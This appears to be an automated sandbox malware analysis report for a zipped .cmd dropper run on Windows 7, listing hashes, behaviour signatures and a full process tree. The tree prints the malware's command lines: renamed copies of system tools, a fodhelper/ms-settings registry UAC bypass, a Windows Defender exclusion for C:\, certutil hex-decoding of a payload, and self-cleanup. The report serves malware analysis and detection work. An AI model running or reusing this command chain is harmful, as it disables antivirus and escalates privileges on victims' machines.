Analysis

  • max time kernel
    146s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-05-2024 09:58

General

  • Target

    17168848892.zip

  • Size

    676KB

  • MD5

    21aa22e186d07a35986264f71c3f2908

  • SHA1

    ae4a9fb6a15713115c5f68864bbab4c4b2094fd1

  • SHA256

    f4906dec2cbdc33af12960aada4dfb76ba22616363fe7fcb26190523ba1cf0f7

  • SHA512

    6fc5b97cff11faf1acd29b373067218fd5d202dee7d4cebc887e0ecad8648acd971e2c0487c9677f1aee97c12f13a1f4909667836e04800fee30fe7303598505

  • SSDEEP

    12288:YCfKAF6dLivsaQaOLi2PB2hXatDuQJy1tTs2u9bdNfOOY0hkwNzZ:hSAc+vsCAi2p2hKtDuvLzA/hn1Z

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17168848892.zip
    1⤵
      PID:2188
    • C:\Windows\system32\verclsid.exe
      "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
      1⤵
        PID:3060
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17168848892.zip"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2744
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\System32\extrac32.exe
          C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
          2⤵
            PID:2988
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
            2⤵
            • Executes dropped EXE
            PID:2992
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
            2⤵
            • Executes dropped EXE
            PID:3004
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1864
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              3⤵
                PID:1912
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2496
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                3⤵
                  PID:2608
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2820
                • C:\Windows\system32\extrac32.exe
                  extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                  3⤵
                    PID:2828
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2844
                  • C:\Windows\system32\extrac32.exe
                    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    3⤵
                      PID:1328
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2248
                    • C:\Users\Public\xkn.exe
                      C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2020
                      • C:\Users\Public\alpha.exe
                        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1312
                        • C:\Users\Public\ger.exe
                          C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                          5⤵
                          • Executes dropped EXE
                          • Modifies registry class
                          PID:1236
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1808
                    • C:\Users\Public\kn.exe
                      C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                      3⤵
                      • Executes dropped EXE
                      PID:2400
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2880
                    • C:\Users\Public\kn.exe
                      C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                      3⤵
                      • Executes dropped EXE
                      PID:1064
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:576
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM SystemSettings.exe
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:688
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                    2⤵
                    • Executes dropped EXE
                    PID:1816
                    • C:\Windows\system32\PING.EXE
                      ping 127.0.0.1 -n 2
                      3⤵
                      • Runs ping.exe
                      PID:304
                  • C:\Users\Public\Libraries\sppsvc.pif
                    C:\Users\Public\Libraries\sppsvc.pif
                    2⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:780
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 676
                      3⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:1648
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                    2⤵
                    • Executes dropped EXE
                    PID:1224
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                    2⤵
                    • Executes dropped EXE
                    PID:1756
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                    2⤵
                    • Executes dropped EXE
                    PID:1416
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:2340
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:1668
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:2984
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:1108
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:2928

                Network

                MITRE ATT&CK Enterprise v15

                Downloads

                • C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd

                  Filesize

                  2.4MB

                  MD5

                  b7d01eac3c560a510c573c4c99da95a5

                  SHA1

                  8129e8b1b26ffc249994b6272cbc14ffdd907d94

                  SHA256

                  397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec

                  SHA512

                  a1d93c930dc91b99ebc3398ede4f260b17b65df5a958eee1dcc3b78495c4f24bb04bae722d45d5cbb3fa76ecc728b0fdc2b2d4a42fc64618e23d452dab1b7a4f

                • C:\Users\Public\Libraries\sppsvc.pif

                  Filesize

                  819KB

                  MD5

                  6b8ff68a24697a15ac47255207740d9d

                  SHA1

                  db01dd1c00c213e8dd2b62bd4670fd0da71a6189

                  SHA256

                  95d6067492b2c592622a88ce2c35a8d7ff5e35ec94eb59decffc74d1ecae6e09

                  SHA512

                  1e569ef7337bffafb361a7e61bcc5e782e32746ba46153da900574d60b50a7941e55c540d89deeb2f758be2dcc04d41fd97fbad1564606169c25c231d05f3089

                • C:\Users\Public\ger.exe

                  Filesize

                  73KB

                  MD5

                  9d0b3066fe3d1fd345e86bc7bcced9e4

                  SHA1

                  e05984a6671fcfecbc465e613d72d42bda35fd90

                  SHA256

                  4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

                  SHA512

                  d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

                • C:\Users\Public\kn.exe

                  Filesize

                  1.1MB

                  MD5

                  ec1fd3050dbc40ec7e87ab99c7ca0b03

                  SHA1

                  ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                  SHA256

                  1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                  SHA512

                  4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

                • C:\Users\Public\sppsvc.rtf

                  Filesize

                  1.6MB

                  MD5

                  3cc0ffd10c8bacf6f9b68a17da21be8c

                  SHA1

                  35bad683b83eb60e459d4c81aec3bd6a62f849b1

                  SHA256

                  fadcab4e7cbf88e1173681625c7f3414e0faad45a11a90f5785d1304c55a8049

                  SHA512

                  52135b3ac29dfd48be9fa8ef95adb88807d09c57b666c7cb2e48661e07e5c9c99acf9fa6368c82fbd5bfd5b20fb816171745236fa200925a7cad8deaed15d27a

                • \Users\Public\alpha.exe

                  Filesize

                  337KB

                  MD5

                  5746bd7e255dd6a8afa06f7c42c1ba41

                  SHA1

                  0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

                  SHA256

                  db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

                  SHA512

                  3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

                • \Users\Public\xkn.exe

                  Filesize

                  462KB

                  MD5

                  852d67a27e454bd389fa7f02a8cbe23f

                  SHA1

                  5330fedad485e0e4c23b2abe1075a1f984fde9fc

                  SHA256

                  a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

                  SHA512

                  327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

                • memory/780-67-0x0000000000400000-0x00000000004D5000-memory.dmp

                  Filesize

                  852KB

                • memory/2020-33-0x000000001B450000-0x000000001B732000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2020-34-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

                  Filesize

                  32KB